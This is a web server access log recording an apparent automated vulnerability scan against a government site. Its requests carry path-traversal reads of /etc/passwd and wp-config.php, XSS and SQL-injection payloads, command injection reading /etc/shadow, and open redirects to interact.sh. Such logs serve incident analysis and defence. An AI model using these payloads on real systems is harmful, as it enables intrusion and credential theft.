2023-10-13 02:21:11 103.153.214.94 GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 0 2 976
2023-10-13 02:21:13 103.153.214.94 GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 202
2023-10-13 02:21:18 103.153.214.94 GET /admin/index.php module=file_editor&file=/../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 301 0 0 198
2023-10-13 02:21:23 103.153.214.94 GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 564
2023-10-13 02:21:24 103.153.214.94 GET /plus/feedback.php/rp4hu'><script>alert(document.domain)</script> aid=3 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 199
2023-10-13 02:22:27 103.153.214.94 GET /microstrategy7/Login.asp Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/2WfF0iU9unJ8ARIINquJi7NXOTY/)%3B%3C%2Fscript%3E%3C 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 204
2023-10-13 02:22:51 103.153.214.94 GET /WebMstr7/servlet/mstrWeb evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204
2023-10-13 02:24:14 103.153.214.94 GET /jasperserver-pro/reportresource/reportresource/ resource=net/sf/jasperreports/../../../../js.jdbc.properties 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 201
2023-10-13 02:25:30 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 211
2023-10-13 02:25:32 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 204
2023-10-13 02:29:10 103.153.214.94 GET /enginemanager/server/logs/download logType=error&logName=../../../../../../../../etc/passwd&logSource=engine 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201
2023-10-13 02:33:48 103.153.214.94 GET /iwc/idcStateError.iwc page=javascript%3aalert(document.domain)%2f%2f 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201
2023-10-13 02:34:17 103.153.214.94 GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 201
2023-10-13 02:34:57 103.153.214.94 GET /index.php q=file:///etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 198
2023-10-13 02:42:11 103.153.214.94 GET /tarantella/cgi-bin/secure/ttawlogin.cgi/ action=start&pg=../../../../../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 200
2023-10-13 02:42:43 103.153.214.94 GET /src/login.php referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204
2023-10-13 02:46:27 103.153.214.94 GET /wp-content/plugins/jsmol2wp/php/jsmol.php isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 205
2023-10-13 02:46:29 103.153.214.94 GET /wp-content/plugins/jsmol2wp/php/jsmol.php isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 203
2023-10-13 02:47:09 103.153.214.94 GET /_s_/dyn/Log_highlight href=../../../../windows/win.ini&n=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 203
2023-10-13 02:48:24 103.153.214.94 POST /php/upload.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.5112.81+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 199
2023-10-13 02:48:27 103.153.214.94 GET /Uploads/2WfF0YLtLWf3BbEFRacPzoeVhkX.php7 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204
2023-10-13 02:50:39 103.153.214.94 GET /imcat/root/tools/adbug/binfo.php phpinfo1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 204
2023-10-13 02:51:24 103.153.214.94 GET /plugins/servlet/Wallboard/ dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 198
2023-10-13 02:52:33 103.153.214.94 POST /wp-content/plugins/wp-payeezy-pay/donate.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 199
2023-10-13 02:54:32 103.153.214.94 POST /XMLCHART - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 199
2023-10-13 02:55:36 103.153.214.94 POST /OA_HTML/lcmServiceController.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 199
2023-10-13 02:56:42 103.153.214.94 POST /ws_utc/resources/setting/options - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 200
2023-10-13 02:56:44 103.153.214.94 POST /ws_utc/resources/setting/keystore - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 202
2023-10-13 02:57:07 103.153.214.94 GET /assets/file:/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200
2023-10-13 02:57:30 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"><script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 200
2023-10-13 02:57:32 103.153.214.94 GET /cs/Satellite pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 198
2023-10-13 02:57:34 103.153.214.94 GET /cs/Satellite pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 197
2023-10-13 02:58:04 103.153.214.94 POST /wp-admin/options-general.php page=smartcode 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 199
2023-10-13 02:58:06 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201
2023-10-13 02:58:40 103.153.214.94 GET /pages/includes/status-list-mo<iframe+src="javascript:alert(document.domain)">.vm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 199
2023-10-13 03:02:08 103.153.214.94 GET /admin/tools/a--</script><script>alert(document.domain)</script> - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 301 0 0 201
2023-10-13 03:02:14 103.153.214.94 GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php page=</script>"><script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200
2023-10-13 03:05:15 103.153.214.94 GET /index.php action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 200
2023-10-13 03:05:30 103.153.214.94 GET /index.php option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 197
2023-10-13 03:09:12 103.153.214.94 POST /soap.cgi service=whatever-control;curl 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 199
2023-10-13 03:09:14 103.153.214.94 GET /include/downmix.inc.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 199
2023-10-13 03:09:19 103.153.214.94 GET /redirector.php url=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 202
2023-10-13 03:09:20 103.153.214.94 GET /redirector.php do=nodelay&url=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200
2023-10-13 03:10:39 103.153.214.94 GET /anchor/errors.log - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 200
2023-10-13 03:13:11 103.153.214.94 GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ajax_path=../../../../../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 1236 14455
2023-10-13 03:13:11 103.153.214.94 GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ajax_path=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 204
2023-10-13 03:13:43 103.153.214.94 POST /user/register element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 bcvt.kontum.gov.vn/user/register 405 0 1 198
2023-10-13 03:16:17 103.153.214.94 GET /index.php m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204
2023-10-13 03:18:01 103.153.214.94 GET /includes/mysql2i/mysql2i.func.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200
2023-10-13 03:18:03 103.153.214.94 GET /addons/phpmailer/phpmailer.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 200
2023-10-13 03:19:10 103.153.214.94 GET /tag_test_action.php url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 03:22:35 103.153.214.94 GET /admin/queues.jsp QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 301 0 0 210
2023-10-13 03:23:57 103.153.214.94 POST /webtools/control/xmlrpc - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 202
2023-10-13 03:25:36 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204
2023-10-13 03:25:38 103.153.214.94 GET /wp-content/uploads/wp-security-audit-log/failed-logins/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 199
2023-10-13 03:25:40 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 201
2023-10-13 03:26:24 103.153.214.94 GET /tests/generate.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 201
2023-10-13 03:29:06 103.153.214.94 GET /wp-content/plugins/wpsite-background-takeover/exports/download.php filename=../../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 202
2023-10-13 03:29:42 103.153.214.94 GET /user/scripts/login_par.js - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 200
2023-10-13 03:30:18 103.153.214.94 GET /sites/all/modules/avatar_uploader/lib/demo/view.php file=../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 199
2023-10-13 03:30:30 103.153.214.94 GET /Admin - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 301 0 0 203
2023-10-13 03:30:31 103.153.214.94 GET /Admin/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn/Admin 200 0 0 209
2023-10-13 03:32:23 103.153.214.94 GET /device.rsp opt=user&cmd=list 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 201
2023-10-13 03:34:17 103.153.214.94 GET /solr/admin/cores wt=json 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 202
2023-10-13 03:35:52 103.153.214.94 GET / id=PbKchB%25{128*128} 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 208
2023-10-13 03:36:28 103.153.214.94 GET /printenv.shtml %3Cscript%3Ealert%281866101260%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 200
2023-10-13 03:36:30 103.153.214.94 GET /ssi/printenv.shtml %3Cscript%3Ealert%281866101260%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 199
2023-10-13 03:38:25 103.153.214.94 GET /google.com/evil.html - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 202
2023-10-13 03:38:25 103.153.214.94 POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 198
2023-10-13 03:42:19 103.153.214.94 GET /http:/www.interact.sh - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 200
2023-10-13 03:43:31 103.153.214.94 POST /timesheet/login.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 202
2023-10-13 03:44:01 103.153.214.94 GET /modules/babel/redirect.php newurl=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 617
2023-10-13 03:45:37 103.153.214.94 GET /plugin/build-metrics/getBuildStats label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter&nodeFilteringType=ALL&nodeFilter&launcherFilteringType=ALL&launcherFilter&causeFilteringType=ALL&causeFilter&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 575
2023-10-13 03:45:37 103.153.214.94 GET /whoAmI/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 202
2023-10-13 03:45:39 103.153.214.94 GET /whoAmI/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 197
2023-10-13 03:45:39 103.153.214.94 GET /glpi/scripts/unlock_tasks.php cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 615
2023-10-13 03:45:41 103.153.214.94 GET /scripts/unlock_tasks.php cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 198
2023-10-13 03:46:12 103.153.214.94 GET / rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 203
2023-10-13 03:46:32 103.153.214.94 GET /api/filemanager path=%2F..%2f..%2fContent 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 453
2023-10-13 03:47:21 103.153.214.94 POST /checkValid - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 198
2023-10-13 03:49:40 103.153.214.94 GET /debug/pprof/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 200
2023-10-13 03:49:44 103.153.214.94 GET /debug/pprof/goroutine debug=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 629
2023-10-13 03:50:52 103.153.214.94 POST /config/pw_snmp_done.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 214
2023-10-13 03:50:54 103.153.214.94 GET /config/pw_snmp.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 199
2023-10-13 03:51:51 103.153.214.94 GET /crowd/plugins/servlet/exp cmd=cat%20/etc/shadow 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204
2023-10-13 03:52:06 103.153.214.94 GET /secure/ContactAdministrators!default.jspa - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 198
2023-10-13 03:55:53 103.153.214.94 GET /LetsEncrypt/Index fileName=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 200
2023-10-13 03:56:00 103.153.214.94 POST /wp-admin/options-general.php page=yuzo-related-post 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 198
2023-10-13 03:56:03 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200
2023-10-13 03:56:49 103.153.214.94 GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 206
